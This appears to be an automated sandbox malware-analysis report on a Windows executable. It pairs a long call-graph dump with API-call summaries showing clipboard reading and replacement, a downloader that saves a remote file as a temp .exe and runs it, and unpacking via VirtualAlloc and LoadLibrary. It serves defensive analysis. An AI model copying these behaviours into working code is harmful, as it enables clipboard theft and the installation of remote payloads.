42b127 65270->65284 65273 42eab9 __Strcoll 20 API calls 65271->65273 65274 42a737 __cftoe 162 API calls 65272->65274 65277 42b137 65273->65277 65275 42b155 65274->65275 65278 42b160 65275->65278 65279 42b2f7 65275->65279 65276 40f8c5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 65280 40299a 65276->65280 65281 42a58d _Atexit 26 API calls 65277->65281 65285 42b208 WideCharToMultiByte 65278->65285 65287 42b16b 65278->65287 65292 42b1a5 WideCharToMultiByte 65278->65292 65282 42b324 WideCharToMultiByte 65279->65282 65283 42b302 65279->65283 65280->65246 65281->65284 65282->65283 65283->65284 65286 42eab9 __Strcoll 20 API calls 65283->65286 65284->65276 65285->65287 65288 42b233 65285->65288 65286->65284 65287->65284 65291 42eab9 __Strcoll 20 API calls 65287->65291 65288->65287 65290 42b23c GetLastError 65288->65290 65290->65287 65294 42b24b 65290->65294 65291->65284 65292->65287 65293 42b264 WideCharToMultiByte 65293->65283 65293->65294 65294->65283 65294->65284 65294->65293 65296 4032df Concurrency::details::SchedulerProxy::DestroyExecutionResource 65295->65296 65297 404672 167 API calls 65296->65297 65298 40330b 65297->65298 65299 404843 167 API calls 65298->65299 65300 403334 65299->65300 65301 404582 26 API calls 65300->65301 65302 403343 65301->65302 65303 403388 std::ios_base::_Ios_base_dtor 65302->65303 65304 40ddd9 167 API calls 65302->65304 65305 4033c4 Concurrency::details::SchedulerProxy::DestroyExecutionResource 65303->65305 65307 40c60e 167 API calls 65303->65307 65306 403358 65304->65306 65305->65249 65306->65303 65308 404582 26 API calls 65306->65308 65307->65305 65309 403369 65308->65309 65310 404c0a 167 API calls 65309->65310 65310->65303 65312 403b8d Concurrency::details::SchedulerProxy::DestroyExecutionResource 65311->65312 65313 4042a5 167 API calls 65312->65313 65314 403b99 65313->65314 65315 403bbd Concurrency::details::SchedulerProxy::DestroyExecutionResource 65314->65315 65316 4034f1 167 API calls 65314->65316 65315->65251 65316->65315 65318 40434c 28 API calls 65317->65318 65319 403122 Concurrency::details::GlobalNode::Initialize 65318->65319 65319->65256 65321 403c22 Concurrency::details::SchedulerProxy::DestroyExecutionResource 65320->65321 65322 40c60e 167 API calls 65321->65322 65323 403c45 65322->65323 65324 4042a5 167 API calls 65323->65324 65325 403c4f 65324->65325 65327 403c92 Concurrency::details::SchedulerProxy::DestroyExecutionResource 65325->65327 65329 4034f1 167 API calls 65325->65329 65326 403c70 65326->65327 65328 4046c0 167 API calls 65326->65328 65327->65258 65328->65327 65329->65326 65331 403cc4 __EH_prolog3_catch 65330->65331 65332 4042a5 167 API calls 65331->65332 65334 403cdd 65332->65334 65333 4046c0 167 API calls 65336 403d66 Concurrency::details::SchedulerProxy::DestroyExecutionResource 65333->65336 65335 403d0d 65334->65335 65337 403695 40 API calls 65334->65337 65335->65333 65336->65261 65337->65335 65338->65260 65339->65260 65340->65268 65341->65204 65343 40cc22 _strlen 65342->65343 65349 40cbbd 65343->65349 65345 401704 65345->65207 65346->65215 65347->65222 65348->65215 65350 40cbf0 65349->65350 65351 40cbcc BuildCatchObjectHelperInternal 65349->65351 65350->65351 65353 40cb52 28 API calls 4 library calls 65350->65353 65351->65345 65353->65351 65362 40f220 EnterCriticalSection 65354->65362 65356 40deea 65357 40ce8f GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 65356->65357 65358 40cec8 65357->65358 65359 40cebd CloseHandle 65357->65359 65360 40cecc GetCurrentThreadId 65358->65360 65359->65360 65360->65229 65361->65228 65362->65356 65372 431f4e GetLastError 65363->65372 65366 42e073 ExitThread 65367 42e091 65369 42e0a4 65367->65369 65370 42e09d CloseHandle 65367->65370 65369->65366 65371 42e0b0 FreeLibraryAndExitThread 65369->65371 65370->65369 65373 431f6d 65372->65373 65374 431f67 65372->65374 65376 434d1a _Atexit 17 API calls 65373->65376 65378 431fc4 SetLastError 65373->65378 65392 435101 11 API calls 2 library calls 65374->65392 65377 431f7f 65376->65377 65385 431f87 65377->65385 65393 435157 11 API calls 2 library calls 65377->65393 65380 42e06f 65378->65380 65380->65366 65380->65367 65391 4354e6 10 API calls 2 library calls 65380->65391 65381 43345a _free 17 API calls 65383 431f8d 65381->65383 65382 431f9c 65384 431fa3 65382->65384 65382->65385 65386 431fbb SetLastError 65383->65386 65394 431d3c 20 API calls _Atexit 65384->65394 65385->65381 65386->65380 65388 431fae 65389 43345a _free 17 API calls 65388->65389 65390 431fb4 65389->65390 65390->65378 65390->65386 65391->65367 65392->65373 65393->65382 65394->65388 65395->65029 65396 402394 65397 402557 PostQuitMessage 65396->65397 65398 4023a8 65396->65398 65402 402555 65397->65402 65399 4023c6 65398->65399 65400 4023af DefWindowProcW 65398->65400 65401 4029ea 167 API calls 65399->65401 65399->65402 65400->65402 65401->65402 65403 432775 65408 432543 65403->65408 65406 43279d 65409 43256e 65408->65409 65416 4326b7 65409->65416 65423 43c8be 170 API calls 2 library calls 65409->65423 65411 432761 65427 42a58d 26 API calls _Deallocate 65411->65427 65413 4326c0 65413->65406 65420 43d00c 65413->65420 65415 432701 65415->65416 65424 43c8be 170 API calls 2 library calls 65415->65424 65416->65413 65426 42eab9 20 API calls _Atexit 65416->65426 65418 432720 65418->65416 65425 43c8be 170 API calls 2 library calls 65418->65425 65428 43c9e1 65420->65428 65422 43d027 65422->65406 65423->65415 65424->65418 65425->65416 65426->65411 65427->65413 65429 43c9ed CallCatchBlock 65428->65429 65430 43c9fb 65429->65430 65433 43ca34 65429->65433 65446 42eab9 20 API calls _Atexit 65430->65446 65432 43ca00 65447 42a58d 26 API calls _Deallocate 65432->65447 65439 43cfbb 65433->65439 65438 43ca0a std::_Locinfo::_Locinfo_ctor 65438->65422 65449 43f931 65439->65449 65442 43ca58 65448 43ca81 LeaveCriticalSection __wsopen_s 65442->65448 65445 43345a _free 20 API calls 65445->65442 65446->65432 65447->65438 65448->65438 65450 43f954 65449->65450 65451 43f93d 65449->65451 65452 43f973 65450->65452 65453 43f95c 65450->65453 65520 42eab9 20 API calls _Atexit 65451->65520 65524 434f9a 10 API calls 2 library calls 65452->65524 65522 42eab9 20 API calls _Atexit 65453->65522 65457 43f942 65521 42a58d 26 API calls _Deallocate 65457->65521 65458 43f961 65523 42a58d 26 API calls _Deallocate 65458->65523 65459 43f97a MultiByteToWideChar 65463 43f9a9 65459->65463 65464 43f999 GetLastError 65459->65464 65461 43cfd1 65461->65442 65473 43d02c 65461->65473 65526 433697 21 API calls 3 library calls 65463->65526 65525 42ea83 20 API calls 2 library calls 65464->65525 65467 43f9b1 65468 43f9d9 65467->65468 65469 43f9b8 MultiByteToWideChar 65467->65469 65471 43345a _free 20 API calls 65468->65471 65469->65468 65470 43f9cd GetLastError 65469->65470 65527 42ea83 20 API calls 2 library calls 65470->65527 65471->65461 65528 43cd8f 65473->65528 65476 43d077 65546 43976e 65476->65546 65477 43d05e 65560 42eaa6 20 API calls _Atexit 65477->65560 65480 43d07c 65482 43d085 65480->65482 65483 43d09c 65480->65483 65481 43d063 65561 42eab9 20 API calls _Atexit 65481->65561 65562 42eaa6 20 API calls _Atexit 65482->65562 65559 43ccfa CreateFileW 65483->65559 65487 43d08a 65563 42eab9 20 API calls _Atexit 65487->65563 65489 43d152 GetFileType 65490 43d1a4 65489->65490 65491 43d15d GetLastError 65489->65491 65568 4396b7 21 API calls 3 library calls 65490->65568 65566 42ea83 20 API calls 2 library calls 65491->65566 65492 43d127 GetLastError 65565 42ea83 20 API calls 2 library calls 65492->65565 65495 43d0d5 65495->65489 65495->65492 65564 43ccfa CreateFileW 65495->65564 65496 43d16b CloseHandle 65496->65481 65498 43d194 65496->65498 65567 42eab9 20 API calls _Atexit 65498->65567 65500 43d11a 65500->65489 65500->65492 65501 43d1c5 65503 43d211 65501->65503 65569 43cf0b 169 API calls 4 library calls 65501->65569 65509 43d23e 65503->65509 65570 43caad 167 API calls 4 library calls 65503->65570 65504 43d199 65504->65481 65507 43d237 65508 43d24f 65507->65508 65507->65509 65511 43cff9 65508->65511 65512 43d2cd CloseHandle 65508->65512 65571 4335bd 29 API calls 2 library calls 65509->65571 65511->65445 65572 43ccfa CreateFileW 65512->65572 65514 43d2f8 65515 43d302 GetLastError 65514->65515 65516 43d247 65514->65516 65573 42ea83 20 API calls 2 library calls 65515->65573 65516->65511 65518 43d30e 65574 439880 21 API calls 3 library calls 65518->65574 65520->65457 65521->65461 65522->65458 65523->65461 65524->65459 65525->65461 65526->65467 65527->65468 65529 43cdb0 65528->65529 65530 43cdca 65528->65530 65529->65530 65582 42eab9 20 API calls _Atexit 65529->65582 65575 43cd1f 65530->65575 65533 43ce02 65536 43ce31 65533->65536 65584 42eab9 20 API calls _Atexit 65533->65584 65534 43cdbf 65583 42a58d 26 API calls _Deallocate 65534->65583 65543 43ce84 65536->65543 65586 42ffcf 26 API calls 2 library calls 65536->65586 65539 43ce7f 65541 43cefe 65539->65541 65539->65543 65540 43ce26 65585 42a58d 26 API calls _Deallocate 65540->65585 65587 42a5ba 11 API calls _Atexit 65541->65587 65543->65476 65543->65477 65545 43cf0a 65547 43977a CallCatchBlock 65546->65547 65590 42e3dd EnterCriticalSection 65547->65590 65549 4397c8 65591 439877 65549->65591 65551 4397a6 65594 43954d 21 API calls 3 library calls 65551->65594 65552 439781 65552->65549 65552->65551 65556 439814 EnterCriticalSection 65552->65556 65553 4397f1 std::_Locinfo::_Locinfo_ctor 65553->65480 65555 4397ab 65555->65549 65595 439694 EnterCriticalSection 65555->65595 65556->65549 65557 439821 LeaveCriticalSection 65556->65557 65557->65552 65559->65495 65560->65481 65561->65511 65562->65487 65563->65481 65564->65500 65565->65481 65566->65496 65567->65504 65568->65501 65569->65503 65570->65507 65571->65516 65572->65514 65573->65518 65574->65516 65577 43cd37 65575->65577 65576 43cd52 65576->65533 65577->65576 65588 42eab9 20 API calls _Atexit 65577->65588 65579 43cd76 65589 42a58d 26 API calls _Deallocate 65579->65589 65581 43cd81 65581->65533 65582->65534 65583->65530 65584->65540 65585->65536 65586->65539 65587->65545 65588->65579 65589->65581 65590->65552 65596 42e425 LeaveCriticalSection 65591->65596 65593 43987e 65593->65553 65594->65555 65595->65549 65596->65593 65597 629005 65598 629079 65597->65598 65601 629816 65598->65601 65602 629825 65601->65602 65605 629fb6 65602->65605 65611 629fd1 65605->65611 65606 629fda CreateToolhelp32Snapshot 65607 629ff6 Module32First 65606->65607 65606->65611 65608 62a005 65607->65608 65610 629815 65607->65610 65612 629c75 65608->65612 65611->65606 65611->65607 65613 629ca0 65612->65613 65614 629cb1 VirtualAlloc 65613->65614 65615 629ce9 65613->65615 65614->65615 65615->65615 65616 4340fa 65617 434106 CallCatchBlock 65616->65617 65618 434112 65617->65618 65619 434129 65617->65619 65650 42eab9 20 API calls _Atexit 65618->65650 65629 42caef EnterCriticalSection 65619->65629 65622 434117 65651 42a58d 26 API calls _Deallocate 65622->65651 65623 434139 65630 434176 65623->65630 65626 434145 65652 43416c LeaveCriticalSection __fread_nolock 65626->65652 65628 434122 std::_Locinfo::_Locinfo_ctor 65629->65623 65631 434184 65630->65631 65632 43419e 65630->65632 65663 42eab9 20 API calls _Atexit 65631->65663 65653 4328f8 65632->65653 65635 434189 65664 42a58d 26 API calls _Deallocate 65635->65664 65636 4341a7 65660 4347c3 65636->65660 65640 4342ab 65642 4342b8 65640->65642 65649 43425e 65640->65649 65641 43422f 65644 43424c 65641->65644 65641->65649 65666 42eab9 20 API calls _Atexit 65642->65666 65665 43448f 31 API calls 4 library calls 65644->65665 65646 434256 65647 434194 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 65646->65647 65647->65626 65649->65647 65667 43430b 30 API calls 2 library calls 65649->65667 65650->65622 65651->65628 65652->65628 65654 432904 65653->65654 65655 432919 65653->65655 65668 42eab9 20 API calls _Atexit 65654->65668 65655->65636 65657 432909 65669 42a58d 26 API calls _Deallocate 65657->65669 65659 432914 65659->65636 65670 434640 65660->65670 65662 4341c3 65662->65640 65662->65641 65662->65647 65663->65635 65664->65647 65665->65646 65666->65647 65667->65647 65668->65657 65669->65659 65671 43464c CallCatchBlock 65670->65671 65672 434654 65671->65672 65676 43466c 65671->65676 65705 42eaa6 20 API calls _Atexit 65672->65705 65673 434720 65710 42eaa6 20 API calls _Atexit 65673->65710 65676->65673 65679 4346a4 65676->65679 65677 434659 65706 42eab9 20 API calls _Atexit 65677->65706 65678 434725 65711 42eab9 20 API calls _Atexit 65678->65711 65695 439694 EnterCriticalSection 65679->65695 65683 43472d 65712 42a58d 26 API calls _Deallocate 65683->65712 65684 4346aa 65686 4346e3 65684->65686 65687 4346ce 65684->65687 65696 434745 65686->65696 65707 42eab9 20 API calls _Atexit 65687->65707 65689 434661 std::_Locinfo::_Locinfo_ctor 65689->65662 65691 4346d3 65708 42eaa6 20 API calls _Atexit 65691->65708 65692 4346de 65709 434718 LeaveCriticalSection __wsopen_s 65692->65709 65695->65684 65713 439911 65696->65713 65698 434757 65699 434770 SetFilePointerEx 65698->65699 65700 43475f 65698->65700 65701 434764 65699->65701 65702 434788 GetLastError 65699->65702 65726 42eab9 20 API calls _Atexit 65700->65726 65701->65692 65727 42ea83 20 API calls 2 library calls 65702->65727 65705->65677 65706->65689 65707->65691 65708->65692 65709->65689 65710->65678 65711->65683 65712->65689 65714 43991e 65713->65714 65717 439933 65713->65717 65728 42eaa6 20 API calls _Atexit 65714->65728 65716 439923 65729 42eab9 20 API calls _Atexit 65716->65729 65720 439958 65717->65720 65730 42eaa6 20 API calls _Atexit 65717->65730 65720->65698 65721 439963 65731 42eab9 20 API calls _Atexit 65721->65731 65722 43992b 65722->65698 65724 43996b 65732 42a58d 26 API calls _Deallocate 65724->65732 65726->65701 65727->65701 65728->65716 65729->65722 65730->65721 65731->65724 65732->65722 65733 402bfa InternetOpenW 65734 402e4b 65733->65734 65737 402c2d Concurrency::details::GlobalNode::Initialize 65733->65737 65735 40f8c5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 65734->65735 65736 402e5a 65735->65736 65745 42deed 65737->65745 65740 42deed std::_Locinfo::_Locinfo_ctor 26 API calls 65741 402e0d 65740->65741 65742 42deed std::_Locinfo::_Locinfo_ctor 26 API calls 65741->65742 65743 402e1f InternetOpenUrlW 65742->65743 65743->65734 65744 402e3a InternetCloseHandle InternetCloseHandle 65743->65744 65744->65734 65746 42df0a 65745->65746 65748 42defc 65745->65748 65754 42eab9 20 API calls _Atexit 65746->65754 65748->65746 65751 42df3a 65748->65751 65750 402dff 65750->65740 65751->65750 65756 42eab9 20 API calls _Atexit 65751->65756 65753 42df14 65755 42a58d 26 API calls _Deallocate 65753->65755 65754->65753 65755->65750 65756->65753 65757 210003c 65758 2100049 65757->65758 65772 2100e0f SetErrorMode SetErrorMode 65758->65772 65763 2100265 65764 21002ce VirtualProtect 65763->65764 65766 210030b 65764->65766 65765 2100439 VirtualFree 65770 21004be 65765->65770 65771 21005f4 LoadLibraryA 65765->65771 65766->65765 65767 21004e3 LoadLibraryA 65767->65770 65769 21008c7 65770->65767 65770->65771 65771->65769 65773 2100223 65772->65773 65774 2100d90 65773->65774 65775 2100dad 65774->65775 65776 2100dbb GetPEB 65775->65776 65777 2100238 VirtualAlloc 65775->65777 65776->65777 65777->65763 65778 40fbfc 65779 40fc08 CallCatchBlock 65778->65779 65807 40ffe9 65779->65807 65781 40fc0f 65782 40fd62 65781->65782 65785 40fc39 65781->65785 65828 4104c3 4 API calls 2 library calls 65782->65828 65784 40fd69 65829 42ffb9 28 API calls _Atexit 65784->65829 65796 40fc78 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 65785->65796 65822 42fcde 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 65785->65822 65787 40fd6f 65830 42ff6b 28 API calls _Atexit 65787->65830 65790 40fd77 65791 40fc58 65792 40fc52 65792->65791 65823 42fc82 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 65792->65823 65794 40fcd9 65818 4105dd 65794->65818 65796->65794 65824 42a356 167 API calls 4 library calls 65796->65824 65798 40fcdf 65799 40fcf4 65798->65799 65825 410613 GetModuleHandleW 65799->65825 65801 40fcfb 65801->65784 65802 40fcff 65801->65802 65803 40fd08 65802->65803 65826 42ff5c 28 API calls _Atexit 65802->65826 65827 410178 13 API calls 2 library calls 65803->65827 65806 40fd10 65806->65791 65808 40fff2 65807->65808 65831 41076b IsProcessorFeaturePresent 65808->65831 65810 40fffe 65832 428817 10 API calls 3 library calls 65810->65832 65812 410003 65813 410007 65812->65813 65833 431791 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 65812->65833 65813->65781 65815 410010 65816 41001e 65815->65816 65834 428840 8 API calls 3 library calls 65815->65834 65816->65781 65835 426820 65818->65835 65821 410603 65821->65798 65822->65792 65823->65796 65824->65794 65825->65801 65826->65803 65827->65806 65828->65784 65829->65787 65830->65790 65831->65810 65832->65812 65833->65815 65834->65813 65836 4105f0 GetStartupInfoW 65835->65836 65836->65821 65837 4332ce 65838 4332db 65837->65838 65841 4332f3 65837->65841 65887 42eab9 20 API calls _Atexit 65838->65887 65840 4332e0 65888 42a58d 26 API calls _Deallocate 65840->65888 65843 43334e 65841->65843 65851 4332eb 65841->65851 65889 434cbd 21 API calls 2 library calls 65841->65889 65844 4328f8 __fread_nolock 26 API calls 65843->65844 65846 433366 65844->65846 65857 432e06 65846->65857 65848 43336d 65849 4328f8 __fread_nolock 26 API calls 65848->65849 65848->65851 65850 433399 65849->65850 65850->65851 65852 4328f8 __fread_nolock 26 API calls 65850->65852 65853 4333a7 65852->65853 65853->65851 65854 4328f8 __fread_nolock 26 API calls 65853->65854 65855 4333b7 65854->65855 65856 4328f8 __fread_nolock 26 API calls 65855->65856 65856->65851 65858 432e12 CallCatchBlock 65857->65858 65859 432e32 65858->65859 65860 432e1a 65858->65860 65861 432ef8 65859->65861 65865 432e6b 65859->65865 65956 42eaa6 20 API calls _Atexit 65860->65956 65963 42eaa6 20 API calls _Atexit 65861->65963 65864 432e1f 65957 42eab9 20 API calls _Atexit 65864->65957 65868 432e7a 65865->65868 65869 432e8f 65865->65869 65866 432efd 65964 42eab9 20 API calls _Atexit 65866->65964 65958 42eaa6 20 API calls _Atexit 65868->65958 65890 439694 EnterCriticalSection 65869->65890 65871 432e27 std::_Locinfo::_Locinfo_ctor 65871->65848 65874 432e87 65965 42a58d 26 API calls _Deallocate 65874->65965 65875 432e7f 65959 42eab9 20 API calls _Atexit 65875->65959 65876 432e95 65878 432eb1 65876->65878 65879 432ec6 65876->65879 65960 42eab9 20 API calls _Atexit 65878->65960 65891 432f19 65879->65891 65883 432eb6 65961 42eaa6 20 API calls _Atexit 65883->65961 65886 432ec1 65962 432ef0 LeaveCriticalSection __wsopen_s 65886->65962 65887->65840 65888->65851 65889->65843 65890->65876 65892 432f43 65891->65892 65893 432f2b 65891->65893 65895 4332ad 65892->65895 65900 432f88 65892->65900 65975 42eaa6 20 API calls _Atexit 65893->65975 65993 42eaa6 20 API calls _Atexit 65895->65993 65896 432f30 65976 42eab9 20 API calls _Atexit 65896->65976 65899 4332b2 65994 42eab9 20 API calls _Atexit 65899->65994 65902 432f93 65900->65902 65903 432f38 65900->65903 65907 432fc3 65900->65907 65977 42eaa6 20 API calls _Atexit 65902->65977 65903->65886 65904 432fa0 65995 42a58d 26 API calls _Deallocate 65904->65995 65906 432f98 65978 42eab9 20 API calls _Atexit 65906->65978 65910 432fdc 65907->65910 65911 433002 65907->65911 65912 43301e 65907->65912 65910->65911 65916 432fe9 65910->65916 65979 42eaa6 20 API calls _Atexit 65911->65979 65982 433697 21 API calls 3 library calls 65912->65982 65915 433007 65980 42eab9 20 API calls _Atexit 65915->65980 65966 43d355 65916->65966 65917 433035 65920 43345a _free 20 API calls 65917->65920 65923 43303e 65920->65923 65921 433187 65924 4331fd 65921->65924 65928 4331a0 GetConsoleMode 65921->65928 65922 43300e 65981 42a58d 26 API calls _Deallocate 65922->65981 65926 43345a _free 20 API calls 65923->65926 65927 433201 ReadFile 65924->65927 65929 433045 65926->65929 65930 433275 GetLastError 65927->65930 65931 43321b 65927->65931 65928->65924 65932 4331b1 65928->65932 65934 43306a 65929->65934 65935 43304f 65929->65935 65936 433282 65930->65936 65937 4331d9 65930->65937 65931->65930 65947 4331f2 65931->65947 65932->65927 65933 4331b7 ReadConsoleW 65932->65933 65938 4331d3 GetLastError 65933->65938 65933->65947 65985 4347de 65934->65985 65983 42eab9 20 API calls _Atexit 65935->65983 65991 42eab9 20 API calls _Atexit 65936->65991 65939 433019 __fread_nolock 65937->65939 65988 42ea83 20 API calls 2 library calls 65937->65988 65938->65937 65940 43345a _free 20 API calls 65939->65940 65940->65903 65945 433054 65984 42eaa6 20 API calls _Atexit 65945->65984 65946 433287 65992 42eaa6 20 API calls _Atexit 65946->65992 65947->65939 65948 433240 65947->65948 65949 433257 65947->65949 65989 432c35 31 API calls 3 library calls 65948->65989 65949->65939 65953 43326e 65949->65953 65990 432a75 29 API calls __fread_nolock 65953->65990 65955 433273 65955->65939 65956->65864 65957->65871 65958->65875 65959->65874 65960->65883 65961->65886 65962->65871 65963->65866 65964->65874 65965->65871 65967 43d362 65966->65967 65968 43d36f 65966->65968 65996 42eab9 20 API calls _Atexit 65967->65996 65970 43d37b 65968->65970 65997 42eab9 20 API calls _Atexit 65968->65997 65970->65921 65972 43d367 65972->65921 65973 43d39c 65998 42a58d 26 API calls _Deallocate 65973->65998 65975->65896 65976->65903 65977->65906 65978->65904 65979->65915 65980->65922 65981->65939 65982->65917 65983->65945 65984->65939 65986 434745 __fread_nolock 28 API calls 65985->65986 65987 4347f4 65986->65987 65987->65916 65988->65939 65989->65939 65990->65955 65991->65946 65992->65939 65993->65899 65994->65904 65995->65903 65996->65972 65997->65973 65998->65972

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3_GS.LIBCMT ref: 004016E6
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00001541,0000004C), ref: 004016F0
                                                                                                                                                                                                                                                    • Part of subcall function 0040CC06: _strlen.LIBCMT ref: 0040CC1D
                                                                                                                                                                                                                                                  • OpenClipboard.USER32(00000000), ref: 0040171D
                                                                                                                                                                                                                                                  • GetClipboardData.USER32(00000001), ref: 0040172D
                                                                                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 0040173C
                                                                                                                                                                                                                                                  • _strlen.LIBCMT ref: 00401749
                                                                                                                                                                                                                                                  • _strlen.LIBCMT ref: 00401778
                                                                                                                                                                                                                                                  • _strlen.LIBCMT ref: 004018BC
                                                                                                                                                                                                                                                  • EmptyClipboard.USER32 ref: 004018D2
                                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018DF
                                                                                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 004018FD
                                                                                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00401909
                                                                                                                                                                                                                                                  • SetClipboardData.USER32(00000001,00000000), ref: 00401912
                                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00401919
                                                                                                                                                                                                                                                  • CloseClipboard.USER32 ref: 0040193D
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000002D2), ref: 00401948
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                                                                                                                                                                                                                  • String ID: i
                                                                                                                                                                                                                                                  • API String ID: 1583243082-3865851505
                                                                                                                                                                                                                                                  • Opcode ID: 072d9209b8aa05484b0dd52e5136abbefd00641ef5953900f6baf6aec7d9e9a8
                                                                                                                                                                                                                                                  • Instruction ID: 84ae510e80891b91da9cfa011cccf91080e50da4f88b7c16b45420ac6e32ace8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 072d9209b8aa05484b0dd52e5136abbefd00641ef5953900f6baf6aec7d9e9a8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB51F331C00384DAE711ABA4EC467AD7774FF29306F04523AE805B22B3EB789A85C75D

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A0D
                                                                                                                                                                                                                                                  • InternetOpenUrlW.WININET(00000000,0045D818,00000000,00000000,00000000,00000000), ref: 00402A23
                                                                                                                                                                                                                                                  • GetTempPathW.KERNEL32(00000105,?), ref: 00402A3F
                                                                                                                                                                                                                                                  • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A55
                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402A8E
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402ACA
                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402AE7
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00402AFD
                                                                                                                                                                                                                                                  • ShellExecuteExW.SHELL32(?), ref: 00402B5E
                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B73
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00402B7F
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00402B88
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00402B8B
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                                                                                                                                                                                                                  • String ID: .exe$<$ShareScreen
                                                                                                                                                                                                                                                  • API String ID: 3323492106-493228180
                                                                                                                                                                                                                                                  • Opcode ID: 1dbf5c5b49a49902ab9d2a0bf01cad431bac49eb19a8523191ea84d20cf0df56
                                                                                                                                                                                                                                                  • Instruction ID: 1f3e70d10a2fb6dcbdd3680cf8e7ca54fef569da526477a1452c3d554320dc38
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1dbf5c5b49a49902ab9d2a0bf01cad431bac49eb19a8523191ea84d20cf0df56
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C41847190021CAFEB209F549D85FEA77BCFF04745F0080F6A548E2190DE749E858FA4
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00629FDE
                                                                                                                                                                                                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 00629FFE
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539762016.0000000000629000.00000040.00000020.00020000.00000000.sdmp, Offset: 00629000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_629000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3833638111-0
                                                                                                                                                                                                                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                  • Instruction ID: 9ae3151deac0473f9cc799d0675f7d68fc17cc55c9a7e300d99728a0de296382
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9F06232200B256BD7603AF5A98DAAB76E9AF89725F100528E647D15C0DA70EC458A71

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
